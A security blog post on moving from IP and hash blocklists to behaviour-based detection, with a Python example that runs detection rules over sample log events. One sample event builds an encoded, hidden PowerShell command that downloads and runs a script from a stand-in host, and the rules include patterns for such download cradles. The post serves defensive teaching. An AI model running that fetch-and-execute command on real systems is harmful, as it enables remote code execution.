Playing Whack a Security

Vidura Supun Ehalapitiya · January 23, 2022

Have you played whack a security? It's like whack a mole, but this version is played with your EDR, proxy and firewall. How to play is easy: you start blocking stuff instead of remediating, and, ironically, just like in the original game, things keep popping up.

Port scan on the perimeter FW? Block the IP.
Log4J scans on the WAF? Block it.
Beaconing on the infrastructure? Block the C2.
Advisory came in for Mimikatz? Block the hash.

But does that really improve the security posture of your organization, beyond putting a bandage over an underlying issue that is a ticking bomb waiting to be exploited?

Instead of the traditional blocking of IP(s) and hashes we can start focusing on what matters. But first, why are these IOCs so unimportant? For that we have to look at the Pyramid of Pain.

As you can see, IP(s), hashes and domains are the easiest for an attacker to change, especially when you are a medium to large business with EDRs, firewalls, IPS and a SOC looking for anything and everything suspicious that is off by a letter. For an attacker to get in through all of this it has to be a targeted attack, and changing the hashes is just a matter of recompiling the binary.

As you can see, there are 400K+ automated web scanning IP(s) per day (taken from Greynoise.io). These will not get past any reputable and updated IPS (depending on the settings), and this is the time defenders should be investing in setting up TTP-based detection.

The attacks that matter, the ones that will actually compromise a network, will not get caught by automated security solutions; that is when we need manual intervention. We disregard these detection methods because they are not very convenient, but trust me, they are well worth the time.

So what can we utilize to further enhance our cyber arsenal? One of the best solutions is YARA, which can be used to detect everything from common malware to lazy zero-day attacks. Sounds fun? I'll do a basic YARA tutorial later.

The next weapon is PowerShell/CMD logs. This might sound very obvious, but you'd be surprised how many people care more about EPS (events per second) and drop these logs, and in turn lose the ability to do any effective level 3 investigation of an incident.

Third is Sysmon, which we can use to detect evil in depth, including Cobalt Strike, the red teamer's best friend.

Deception comes fourth: set up honey traps and watch them closely, like a honey admin account or a juicy honey file to attract an attacker who is already in the network.

Why set these traps up? By creating detections on TTPs and patterns you catch more than the intended culprit. As an example, you can watch this video https://www.youtube.com/watch?v=borfuQGrB8g&t=994s to get an idea of what I'm saying from Chad Tilbury himself.
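To make the Pyramid of Pain point concrete, here is an added example (my own code, not from the original post) that runs a few TTP-based and deception-based detections over a handful of constructed log events modelled loosely on Sysmon process-create, PowerShell encoded commands and Windows logon events, next to a plain hash blocklist check. The hash, account name, event field names and event values are all simplified assumptions built for the example; the recompiled binary in the sample has a different hash from the one "in the advisory", so the blocklist never fires, while the behavioural rules (Office spawning a shell, an encoded download cradle, a honey admin account being used) catch the same activity.

```python
# Added example (not from the original post): TTP-based detections run over a
# few constructed Sysmon/PowerShell-style events, beside a hash-only blocklist
# check that the same events walk straight past. Event shapes, field names,
# hashes and account names are simplified assumptions, not real telemetry.
import base64
import re

# A hash "from an advisory" (constructed). The sample binary below has a
# different hash because the attacker recompiled it: this list never fires.
BLOCKED_SHA256 = {"cc" * 32}

# Deception: an account that exists only as bait. Any use of it is an alert.
HONEY_ACCOUNTS = {"svc_backup_admin"}

# Constructed encoded command: UTF-16LE then base64, as -EncodedCommand expects.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    # Process create: Word spawning a hidden, encoded PowerShell (constructed)
    {"eid": 1, "image": "powershell.exe", "parent": "WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}", "sha256": "aa" * 32},
    # Process create: recompiled tool with a benign-looking name and a new hash
    {"eid": 1, "image": "update.exe", "parent": "explorer.exe",
     "cmdline": "update.exe", "sha256": "dd" * 32},
    # Logon: someone used the honey admin account
    {"eid": 4624, "user": "svc_backup_admin", "src_ip": "10.0.5.23"},
    # Logon: a normal user
    {"eid": 4624, "user": "alice", "src_ip": "10.0.5.24"},
]

OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_hash_blocklist(ev):
    """Bottom of the pyramid: matches only the exact hash from the advisory."""
    return ev.get("eid") == 1 and ev.get("sha256") in BLOCKED_SHA256


def rule_office_spawns_shell(ev):
    """TTP: an Office application starting a shell or script host."""
    return (ev.get("eid") == 1 and ev.get("parent", "").upper() in OFFICE_PARENTS
            and ev.get("image", "").lower() in SHELLS)


def rule_encoded_download_cradle(ev):
    """TTP: encoded PowerShell whose decoded body fetches and runs remote code."""
    if ev.get("eid") != 1:
        return False
    body = decode_encoded_command(ev.get("cmdline", ""))
    if body is None:
        return False
    return bool(re.search(r"\bIEX\b|Invoke-Expression", body, re.I)
                and re.search(r"DownloadString|DownloadFile|WebClient", body, re.I))


def rule_honey_account_used(ev):
    """Deception: the bait account should never be used by anyone."""
    return ev.get("eid") == 4624 and ev.get("user") in HONEY_ACCOUNTS


RULES = [rule_hash_blocklist, rule_office_spawns_shell,
         rule_encoded_download_cradle, rule_honey_account_used]


def run_detections(events):
    """Return (rule name, event index) pairs for every rule that fired."""
    return [(rule.__name__, i) for i, ev in enumerate(events)
            for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, idx in run_detections(SAMPLE_EVENTS):
        print(f"{name:30s} event #{idx}")
```

Running it, the hash rule fires on nothing, while the Office-spawns-shell and encoded-cradle rules both flag event 0 and the honey account rule flags event 2. The point is that the behavioural rules do not care what the payload hashes to or which IP it came from; they describe what the attacker has to do, which is the expensive thing for them to change.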

Attackers are moving forward and we can't hide forever behind the perimeter. It's high time we stop taking knives to a lightsaber fight and push back. In the end what matters is keeping the assets secured, not having a 233222882-entry IP blocklist.
